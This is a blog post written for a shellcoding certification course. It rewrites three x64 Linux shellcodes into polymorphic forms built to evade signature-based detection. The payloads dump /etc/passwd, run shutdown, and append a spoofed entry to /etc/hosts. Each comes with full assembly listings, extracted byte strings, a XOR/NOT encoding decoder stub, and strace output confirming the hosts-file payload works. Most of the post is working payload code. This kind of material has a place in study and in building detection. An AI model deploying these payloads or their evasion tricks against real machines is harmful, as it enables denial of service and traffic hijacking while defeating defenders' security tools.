Codehead's Corner
Random ramblings on hacking, coding, fighting with infrastructure and general tech
Security Tube SLAE64 Course - Assessment 6 - Polymorphic Payloads
Posted: 24 Nov 2017 at 20:29 by Codehead

After completing the video lectures of the Security Tube Linux 64 bit Assembler Expert course (SLAE64), a series of assessments must be completed to gain certification. This is the sixth assignment; take three x64 payloads from ShellStorm and create new, polymorphic versions which have the same functionality.

While this sounds super cool, what we’re actually doing is simply changing the content of the shellcode to try to evade detection by basic security tools that use signature based matching to recognise threats. A limitation of the assignment is to stay within 150% of the original payload size.

Dump Password Payload

As most of the previous assignments have focused on network operations, I chose the first shellcode sample because it used file I/O.

The starting point is Mr.Un1k0d3r’s Read /etc/passwd payload which is 82 bytes in size:

BITS 64
; Author Mr.Un1k0d3r - RingZer0 Team
; Read /etc/passwd Linux x86_64 Shellcode
; Shellcode size 82 bytes
global _start

section .text

_start:
jmp _push_filename
  
_readfile:
; syscall open file
pop rdi ; pop path value
; NULL byte fix
xor byte [rdi + 11], 0x41
  
xor rax, rax
add al, 2
xor rsi, rsi ; set O_RDONLY flag
syscall
  
; syscall read file
sub sp, 0xfff
lea rsi, [rsp]
mov rdi, rax
xor rdx, rdx
mov dx, 0xfff; size to read
xor rax, rax
syscall
  
; syscall write to stdout
xor rdi, rdi
add dil, 1 ; set stdout fd = 1
mov rdx, rax
xor rax, rax
add al, 1
syscall
  
; syscall exit
xor rax, rax
add al, 60
syscall
  
_push_filename:
call _readfile
path: db "/etc/passwdA"

The original code uses the jump, call, pop method to locate the address of the ‘/etc/passwd’ string at the end of the payload. We can mutate this by converting the string into a hex number and pushing it onto the stack. This involves reversing the string and breaking it into 8 byte chunks. Note that we can’t use a NULL terminator on the string, so we’ll use a value of 0x1 and fix it afterwards.

push 0x01647773             ; 0x01 + dws
mov rbx, 0x7361702f6374652f ; sap/cte/
push rbx
mov rdi, rsp                ; Get address of path string
dec byte [rdi+11]           ; NULL byte fix

This change saves 2 bytes and transforms the raw strings visible in the shellcode.

The remainder of the first section sets the parameters for the SYS_OPEN syscall. We can modify these and save another 2 bytes:

push 2
sub rsi, rsi           ; set O_RDONLY flag
pop rax
syscall

The next section of the payload uses SYS_READ to read the content of the file into a buffer of 0xfff (4096 decimal) bytes which is allocated on the stack. There isn’t much to work with here, but we can optimise the parameter shuffling by swapping in known zero values instead of XORing and use a subtract operation to hide the 0xfff value.

push rax        ; Save file handle
xchg rsi, rax   ; Zero out RAX
push rax
pop rdx
pop rdi
sub dx, 0xf001
sub rsp, rdx    ; Make room on the stack
lea rsi, [rsp]  ; Pass the buffer address
syscall

These changes save a further 4 bytes.

The third section uses SYS_WRITE to dump the data from the stack buffer to STDOUT. Again, there isn’t much to work with, but by optimising the parameters we can save 8 bytes:

push 1
pop rdx
xchg rax, rdx   ; syscall id and read size
push rax
pop rdi         ; fd id
syscall

The last section is a simple SYS_EXIT, all we can do here is try to save some bytes:

push 60
pop rax
syscall

Putting the whole thing together gives us pw_dump.nasm:

push 0x01647773
mov rbx, 0x7361702f6374652f
push rbx
mov rdi, rsp      ; Get addr of path string
dec byte [rdi+11] ; NULL byte fix
push 2
sub rsi, rsi      ; set O_RDONLY flag
pop rax
syscall           ; sys_open

push rax          ; Save file handle
xchg rsi, rax     ; Zero out RAX
push rax
pop rdx
pop rdi           ; File ID
sub dx, 0xf001
sub rsp, rdx      ; Make room on the stack
lea rsi, [rsp]    ; Pass the buffer address
syscall           ; sys_read

push 1
pop rdx
xchg rax, rdx     ; syscall id and read size
push rax
pop rdi           ; STDOUT (1)
syscall           ; sys_write

push 60 
pop rax
syscall           ; sys_exit

Extracting the payload results in a 64 byte shellcode string; a saving of 18 bytes:

"\x68\x73\x77\x64\x01\x48\xbb\x2f\x65\x74\x63\x2f"
"\x70\x61\x73\x53\x48\x89\xe7\xfe\x4f\x0b\x6a\x02"
"\x48\x29\xf6\x58\x0f\x05\x50\x48\x96\x50\x5a\x5f"
"\x66\x81\xea\x01\xf0\x48\x29\xd4\x48\x8d\x34\x24"
"\x0f\x05\x6a\x01\x5a\x48\x92\x50\x5f\x0f\x05\x6a"
"\x3c\x58\x0f\x05"

Shutdown

The next shellcode sample to be tackled is shutdown -h now by Osanda Malith Jayathissa which is a 65 byte payload.

; Title: shutdown -h now x86_64 Shellcode - 65 bytes
; Platform: linux/x86_64
; Date: 2014-06-27
; Author: Osanda Malith Jayathissa (@OsandaMalith)

section .text

global _start

_start:

xor rax, rax
xor rdx, rdx 

push rax

push byte 0x77
push word 0x6f6e ; now
mov rbx, rsp

push rax
push word 0x682d ;-h
mov rcx, rsp

push rax
mov r8, 0x2f2f2f6e6962732f ; /sbin/shutdown
mov r10, 0x6e776f6474756873
push r10
push r8
mov rdi, rsp

push rdx
push rbx
push rcx
push rdi
mov rsi, rsp

add rax, 59
syscall

There is another version of this code from another SLAE student on the ShellStorm site which is 1 byte smaller and uses some payload encoding. I decided to start with the original and see what I could do.

The code is an execve call to the system’s shutdown command. At the start the RAX and RDX registers are cleared. Looking through the code, RDX isn’t used until the end where becomes a syscall parameter while RAX is used to push zeros onto the stack until the syscall at the end. This seems wasteful so we’ll just clear RDX for zero pushes and worry about RAX later.

_start:
xor rdx, rdx
push rdx

The first PUSH adds a NULL to terminate the argument array which will be built in the next steps.

The next three sections push the argument strings onto the stack. As we’re working through the argument array in reverse, the ‘now’ string is the first item.

The original code pushes hexadecimal values to build the strings. I decided to use NOT inverted strings throughout the code to hide the content. This conceals the string values in the raw shellcode and gets around the NULL byte problem at the same time. However, pushing and NOTing the strings one at a time bloated the shellcode up to about 82 bytes.

...

push dword 0xffffffffff889091  ; inverse of 'now\x00'
not qword [rsp]
push rsp
pop rbx

...

A second attempt at pushing the inverted strings and running a NOT loop over the stack afterwards got the code down to 76 bytes, but this was still not good enough. Some restructuring is required.

First, we define our inverted strings as data bytes and get the address using the jump, call, pop method:

  jmp _str ; Get addr of strings in RAX
_build:
  pop rax  

  ...

_str:
  call _build
_now: db 0x91, 0x90, 0x88, 0xff
_h:   db 0xd2, 0x97, 0xff
_cmd: db 0xd0, 0x8c, 0x9d, 0x96, 0x91, 0xd0, 0x8c, 0x97, 0x8a, 0x8b, 0x9b, 0x90, 0x88, 0x91, 0xff

With the start address of the data in RAX, we can build the argument array on the stack and store its address in RSI ready for the execve syscall:

push rax           ; 'now'
lea rdi, [rax+4]   ; '-h'
push rdi
lea rdi, [rax+7]   ; '/sbin/shutdown'
push rdi
push rsp           ; Save arg array addr
pop rsi

Using RDI for the effective address calculations also means that the command string for the syscall is populated at this point.

The strings are still mangled, but we can run the NOT loop over the original data location using the value in RAX:

push 0x16
pop rcx
_decode:
not byte [rax]
inc rax
loop _decode

Now RDI and RSI point to decoded strings, RDX was cleared at the start, all that remains is to trigger the syscall:

push 0x3b
pop rax
syscall

The complete listing of shutdown.nasm is pretty compact:

global _start
section .TEXT exec write

_start:
  xor rdx, rdx
  push rdx ; NULL to terminate arg array

  jmp _str ; Get addr of strings in RAX
_build:
  pop rax  

; Load string addresses onto stack
  push rax           ; 'now'
  lea rdi, [rax+4]   ; '-h'
  push rdi
  lea rdi, [rax+7]   ; '/sbin/shutdown'
  push rdi
  push rsp           ; Save arg array addr
  pop rsi

; Decode strings
  push 0x16
  pop rcx
_decode:
  not byte [rax]
  inc rax
  loop _decode

  push 0x3b
  pop rax
  syscall

_str:
  call _build
_now: db 0x91, 0x90, 0x88, 0xff
_h:   db 0xd2, 0x97, 0xff
_cmd: db 0xd0, 0x8c, 0x9d, 0x96, 0x91, 0xd0, 0x8c, 0x97, 0x8a, 0x8b, 0x9b, 0x90, 0x88, 0x91, 0xff

Shellcode Extraction results in a 62 byte string, just squeezing under the original and alternative implementations.

"\x48\x31\xd2\x52\xeb\x1d\x58\x50\x48\x8d\x78"
"\x04\x57\x48\x8d\x78\x07\x57\x54\x5e\x6a\x16"
"\x59\xf6\x10\x48\xff\xc0\xe2\xf9\x6a\x3b\x58"
"\x0f\x05\xe8\xde\xff\xff\xff\x91\x90\x88\xff"
"\xd2\x97\xff\xd0\x8c\x9d\x96\x91\xd0\x8c\x97"
"\x8a\x8b\x9b\x90\x88\x91\xff"; 

Add Host Mapping

For the last example I decided to try another file based example: Add map in /etc/hosts file also by Osanda Malith Jayathissa. This is a 110 byte payload that adds a spoof mapping to the /etc/hosts file allowing redirection of network traffic.

; Title: Add map in /etc/hosts file - 110 bytes
; Date: 2014-10-29
; Platform: linux/x86_64
; Website: http://osandamalith.wordpress.com
; Author: Osanda Malith Jayathissa (@OsandaMalith)

global _start
    section .text

_start:
    ;open
    xor rax, rax 
    add rax, 2  ; open syscall
    xor rdi, rdi
    xor rsi, rsi
    push rsi ; 0x00 
    mov r8, 0x2f2f2f2f6374652f ; stsoh/
    mov r10, 0x7374736f682f2f2f ; /cte/
    push r10
    push r8
    add rdi, rsp
    xor rsi, rsi
    add si, 0x401
    syscall

    ;write
    xchg rax, rdi
    xor rax, rax
    add rax, 1 ; syscall for write
    jmp data

write:
    pop rsi 
    mov dl, 19 ; length in rdx
    syscall

    ;close
    xor rax, rax
    add rax, 3
    syscall

    ;exit
    xor rax, rax
    mov al, 60
    xor rdi, rdi
    syscall 

data:
    call write
    text db '127.1.1.1 google.lk'

For this exercise I decided to use a different method of string referencing. A CALL instruction can be used to jump over an inline string while helpfully placing the string’s address on the stack. Unfortunately, because 64 bit CALLs are minimum of 4 bytes, they introduce zeros into the shellcode. This is normally handled by jumping backwards, but in this example we’ll try something else.

In the first section where we call the SYS_OPEN syscall, the path string can be incorporated into the code with a CALL. This really helps reduce the size of the final shellcode:

; open
  xor rsi, rsi
  add si, 0x401  ; read/write and append flags
  call _jump1
  db '/etc/hosts', 0x00
_jump1:
  pop rdi        ; path reference
  push 2
  pop rax       
  syscall

However, the disassembly shows the zeros introduces by the CALL instruction:

0000000000600078 <_start>:
  600078: 48 31 f6              xor    rsi,rsi
  60007b: 66 81 c6 01 04        add    si,0x401
  600080: e8 0b 00 00 00        call   600090 <_jump1>
  600085: 2f 65 74 63 ...       (bad)  
  ...

0000000000600090 <_jump1>:
  600090: 5f                    pop    rdi
  600091: 6a 02                 push   0x2
  600093: 58                    pop    rax
  600094: 0f 05                 syscall 

To solve this and obscure the string contents, we will encode the entire payload and write a small decoder header.

The remainder of the code is quite straightforward and we can make some quick optimisations to bring the size down.

The final pre-encoding version is addhost_pre_encode.nasm

_start:
; open
  xor rsi, rsi
  add si, 0x401  ; read/write and append flags
  call _jump1
  db '/etc/hosts', 0x00
_jump1:
  pop rdi        ; path reference
  push 2
  pop rax       
  syscall

; write
  xchg rax, rdi
  push 1
  pop rax        ; syscall for write
  call _jump2
  db '127.1.1.1 google.lk', 0xa
_jump2:
  pop rsi 
  push 20        ; data length in rdx
  pop rdx 
  syscall

;close
  push 3
  pop rax
  syscall

;exit
  push 60
  pop rax
  syscall 

The optimisations have squeezed the code down to 76 bytes, leaving 34 bytes to write the decoder stub.

A simple one byte XOR encoding of the shellcode requires a few lines of Python:

MBP:slae64$ python
Python 2.7.3 (default, Oct 26 2016, 21:01:49) 
[GCC 4.6.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import sys
>>> payload = [0x48,0x31,0xf6,0x66,0x81,0xc6,0x01,0x04,0xe8,0x0b,0x00,0x00,0x00,0x2f,0x65, ...
>>> for b in payload:
...     sys.stdout.write(hex(b ^ 0x41) + ',')
... 
0x9,0x70,0xb7,0x27,0xc0,0x87,0x40,0x45,0xa9,0x4a,0x41,0x41,0x41,0x6e,0x24,0x35,0x22,0x6e,0x29,
0x2e,0x32,0x35,0x32,0x41,0x1e,0x2b,0x43,0x19,0x4e,0x44,0x9,0xd6,0x2b,0x40,0x19,0xa9,0x55,0x41,
0x41,0x41,0x70,0x73,0x76,0x6f,0x70,0x6f,0x70,0x6f,0x70,0x61,0x26,0x2e,0x2e,0x26,0x2d,0x24,0x6f,
0x2d,0x2a,0x4b,0x1f,0x2b,0x55,0x1b,0x4e,0x44,0x2b,0x42,0x19,0x4e,0x44,0x2b,0x7d,0x19,0x4e,0x44,
>>>

The decoder header uses a jump, call and pop to get the address of the payload, then a simple bytewise XOR loop to decode the data.

_start:
jmp _code_marker ; Get the payload address
_decode:
pop rax

push 76      ; Decode
pop rcx
_decode_loop:
xor byte [rax], 0x41
inc rax
loop _decode_loop

jmp _payload     ; Jump to decoded payload

_code_marker:
call _decode
_payload:
db 0x09,0x70,0xb7,0x27,0xc0,0x87,0x40,0x45,0xa9,0x4a
db 0x41,0x41,0x41,0x6e,0x24,0x35,0x22,0x6e,0x29,0x2e
db 0x32,0x35,0x32,0x41,0x1e,0x2b,0x43,0x19,0x4e,0x44
db 0x09,0xd6,0x2b,0x40,0x19,0xa9,0x55,0x41,0x41,0x41
db 0x70,0x73,0x76,0x6f,0x70,0x6f,0x70,0x6f,0x70,0x61
db 0x26,0x2e,0x2e,0x26,0x2d,0x24,0x6f,0x2d,0x2a,0x4b
db 0x1f,0x2b,0x55,0x1b,0x4e,0x44,0x2b,0x42,0x19,0x4e
db 0x44,0x2b,0x7d,0x19,0x4e,0x44

There is a little bit of faff with labels on the payload, we must jump over the call _decode instruction to the _payload marker after the decode loop completes or we will get stuck in an endless decoder loop. Fortunately, labels don’t add to the size of the shellcode and short jumps are only two bytes.

This completes the addhost.nasm code. The final size of the shell code is 97 bytes, well under the original, even with added content obfuscation.

We can test the operation of the shellcode using strace to confirm the syscalls:

MBP:slae64$ strace ./addhost
execve("./addhost", ["./addhost"], [/* 23 vars */]) = 0
open("/etc/hosts", O_WRONLY|O_APPEND)   = 3
write(3, "127.1.1.1 google.lk\n", 20)   = 20
close(3)                                = 0
_exit(3)                                = ?
MBP:slae64$ 

Conclusion

I have deliberately tried to select some different payloads in this assignment and I have used different techniques to add some variety to the results. This has been very useful in allowing me to experiment with some of the optimisations and tricks I have seen while studying the SLAE64 course.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://www.securitytube-training.com/online-courses/x8664-assembly-and-shellcoding-on-linux/index.html

Student ID: SLAE64-1471



Site powered by Hugo.
Polymer theme by pdevty, tweaked by Codehead